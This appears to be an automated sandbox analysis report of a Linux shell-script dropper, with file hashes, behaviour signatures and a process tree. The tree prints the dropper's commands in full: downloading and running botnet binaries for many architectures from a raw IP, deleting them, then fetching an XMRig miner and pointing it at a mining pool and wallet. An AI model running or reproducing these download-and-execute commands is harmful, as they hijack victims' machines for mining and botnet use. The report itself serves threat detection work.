Analysis
-
max time kernel
95s -
max time network
96s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
09-11-2024 04:09
General
-
Target
tyo2831qq.sh
-
Size
1KB
-
MD5
e12d6a1166c4e290ed4ba39f96c780ad
-
SHA1
57038253b27c0312102758d25a77b5d1859cba3e
-
SHA256
5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
-
SHA512
276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/tyo2831qq.sh/tmp/tyo2831qq.sh1⤵
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.mips./tyo2831qq.mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://31.172.80.237/bots2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 bots2⤵
- File and Directory Permissions Modification
-
-
/tmp/bots./bots2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mpsl2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.mpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.mpsl./tyo2831qq.mpsl2⤵
- Reads system routing table
- Reads system network configuration
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.sh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.sh42⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.sh4./tyo2831qq.sh42⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.x86./tyo2831qq.x862⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm62⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.arm62⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.arm6./tyo2831qq.arm62⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x322⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.x322⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.x32./tyo2831qq.x322⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.ppc./tyo2831qq.ppc2⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.i5862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.i5862⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.i586./tyo2831qq.i5862⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.m68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.m68k./tyo2831qq.m68k2⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.spc2⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm42⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm72⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tyo2831qq.arm72⤵
- File and Directory Permissions Modification
-
-
/tmp/tyo2831qq.arm7./tyo2831qq.arm72⤵
-
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm52⤵
-
-
/bin/rmrm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x862⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 xmrig2⤵
- File and Directory Permissions Modification
-
-
/tmp/xmrig./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD55e330d55bb520266447b86c2c47fdc0f
SHA128e862fa757fba4f7dca7fbeac6433b1bdf75ca7
SHA256ea7045dc1e2dd6c47941880d671c5ba8536a20728965c362881e7fee0fb3d1b2
SHA5128232b08e80b64a8fe7b46140e9ad7a170a06a66e59a6f728b9fda80531033d2ebe0fe68c0dde05a0e832d96c8817678e1ae27a8729a7e6d0c23ad06c8b9a6262
-
Filesize
16KB
MD52615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA14286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78
-
Filesize
7.9MB
MD549fde861072798623bf35de4794f7d3d
SHA11c9b225d3e34db9c2a0fecb9f2c254da1371f953
SHA2568268144d8232fc0dae86c2536eef50916e4ee9a23b15a561aa72971714359383
SHA51214393a6a7f9103340338e74457c6f95eb7180d2a90b87e01945be621a0d0798c05fdfb08ec3dbc2ca61ee2cbb6299b48e8b27c01b00913b5e5e9ed704318ac22